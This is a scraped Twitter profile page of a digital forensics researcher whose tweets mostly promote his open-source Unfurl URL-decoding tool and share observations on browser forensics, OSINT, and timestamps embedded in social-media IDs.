Ryan Benson @_RyanBenson
I do digital forensics and work on open source DFIR tools @Google. I kinda like web browsers, too. Not on Twitter often anymore, reach me at ryan 'at' https://t.co/Zcq6BJG4xC dfir.blog SF Bay Area Joined April 2009
Tweets: 1K - Followers: 4K - Following: 267 - Likes: 852
@GergelyOrosz FYI that link in the screenshot is acquired by the user tapping "Copy Link" button from the Twitter app on iPhone. That's what the parameter "s=46" means. It's safe to also drop that from the final URL. Here's where I got the s-parameter table to look up: dfir.blog/unfurl-parsing…
With all the uncertainty @twitter, I've seen more people talking about alternatives like #Mastodon. Like tweets, Mastodon IDs have embedded timestamps in them, and Unfurl can parse them: 🔗dfir.blog/unfurl/?url=ht… #DFIR #OSINT
We are reviewing our @MISPProject warning lists and we are looking for a maintained list of hosts which are domain parking. Do you know someone doing such a thing? Or should we start to build one from scratch? #threatintelligence
A key mindset to grasp as you transition from junior analyst to a more experienced level is that you won't have all the answers, but you can ask the right questions and know where to start looking for the answers.
Nice little tidbit here about decoding #LinkedIn profile ids from URLs, then using their sequential nature to estimate profile creation time. I see an @unfurl_link update in the future! #DFIR #OSINT
Apparently TikTok uses the same ID scheme for job postings as it does for videos? Random, but kind of interesting.🤷♂️ Example: dfir.blog/unfurl/?url=ht… More info on TikTok timestamps: dfir.blog/tinkering-with… #DFIR #TikTok #OSINT
Have a long URL to decode? Use dfir.blog/unfurl/. It decodes parameters & values in the URL. Ex: I used Amazon & ran a search, copied URL, pasted into Unfurl. It broke the URL down & revealed "qid" param (2) is a time stamp and a date (3). #osint #cyber #tools
If you want a refresher on the benefits of allowlisting vs denylisting, just ask a 5 year old to stop doing something.
Hey, thanks! Your #DailyOSINT looks really interesting too!
IP address in the URL? Sure, why not. You never know what you'll find in a URL (until you look 👀). 🔗dfir.blog/unfurl/?url=ht… #DFIR #OSINT
If you need to pull out all the data in complicated URLs, try the excellent Unfurl tool to extract and visualize each bit in the URLs. dfir.blog/unfurl/ github.com/obsidianforens… @_RyanBenson #OSINT #DFIR #BlueTeam #ThreatIntel #intelligence #ThreatHunting #infosec
Wooo! Thanks!
On browser forensics in #DFIR: In news.sophos.com/en-us/2022/04/…, just from the URL we can see the attackers installed Chrome the week of 2021-11-01. So much interesting stuff in URLs! Unfurl 🔗: dfir.blog/unfurl/?url=hX… h/t @phillmoore for the article and lots of nice Google research
<Thread> Today on the way to school, I accidentally deep-dived on threat modeling, attacker math, risk acceptance, password management, and ethics with my kids (6 and 4 years old). 6YO started with a simple question: how do we prevent our car from getting stolen? 1/x
For analysts, a few questions related to web browser-forensics... First, how often do you reach for web browser-related forensic evidence in the investigations you work?
Hi #OSINTSummit folks! 👋 Unfurl is a free, open source tool that you can use to "expand" complicated URLs and find interesting things inside them, like: 🕓 timestamps 🗜️ compressed strings 🔎 search params 🔀 shortlinks Check it out at unfurl.link! #DFIR #OSINT
